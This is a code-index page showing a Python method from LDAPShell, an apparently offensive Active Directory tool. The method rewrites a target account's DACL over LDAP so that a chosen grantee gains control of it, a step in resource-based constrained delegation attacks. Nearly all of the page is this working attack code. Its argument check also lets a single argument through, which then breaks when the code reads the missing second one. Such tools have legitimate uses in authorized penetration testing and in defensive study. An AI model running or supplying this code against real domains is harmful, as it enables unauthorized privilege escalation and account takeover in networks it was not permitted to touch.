MCPcopy Index your code
hub / github.com/XiaoliChan/LDAPShell / do_grant_control

Method do_grant_control

utils/ldap_shell.py:496–542  ·  view source on GitHub ↗
(self, line)

Source from the content-addressed store, hash-verified

494 print("Unable to Read LAPS Password for Computer")
495
496 def do_grant_control(self, line):
497 args = shlex.split(line)
498
499 if len(args) != 1 and len(args) != 2:
500 raise Exception("Error expecting target and grantee names for RBCD attack. Recieved %d arguments instead." % len(args))
501
502 controls = security_descriptor_control(sdflags=0x04)
503
504 target_name = args[0]
505 grantee_name = args[1]
506
507 success = self.client.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(target_name), attributes=['objectSid', 'nTSecurityDescriptor'], controls=controls)
508 if success is False or len(self.client.entries) != 1:
509 raise Exception("Error expected only one search result got %d results", len(self.client.entries))
510
511 target = self.client.entries[0]
512 target_sid = target["objectSid"].value
513 print("Found Target DN: %s" % target.entry_dn)
514 print("Target SID: %s\n" % target_sid)
515
516 success = self.client.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(grantee_name), attributes=['objectSid'])
517 if success is False or len(self.client.entries) != 1:
518 raise Exception("Error expected only one search result got %d results", len(self.client.entries))
519
520 grantee = self.client.entries[0]
521 grantee_sid = grantee["objectSid"].value
522 print("Found Grantee DN: %s" % grantee.entry_dn)
523 print("Grantee SID: %s" % grantee_sid)
524
525 try:
526 sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=target['nTSecurityDescriptor'].raw_values[0])
527 except IndexError:
528 sd = self.create_empty_sd()
529
530 sd['Dacl'].aces.append(self.create_allow_ace(grantee_sid))
531 self.client.modify(target.entry_dn, {'nTSecurityDescriptor':[ldap3.MODIFY_REPLACE, [sd.getData()]]}, controls=controls)
532
533 if self.client.result['result'] == 0:
534 print('DACL modified successfully!')
535 print('%s now has control of %s' % (grantee_name, target_name))
536 else:
537 if self.client.result['result'] == 50:
538 raise Exception('Could not modify object, the server reports insufficient rights: %s', self.client.result['message'])
539 elif self.client.result['result'] == 19:
540 raise Exception('Could not modify object, the server reports a constrained violation: %s', self.client.result['message'])
541 else:
542 raise Exception('The server returned an error: %s', self.client.result['message'])
543
544 def do_set_rbcd(self, line):
545 args = shlex.split(line)

Callers

nothing calls this directly

Calls 3

create_empty_sdMethod · 0.95
create_allow_aceMethod · 0.95
searchMethod · 0.80

Tested by

no test coverage detected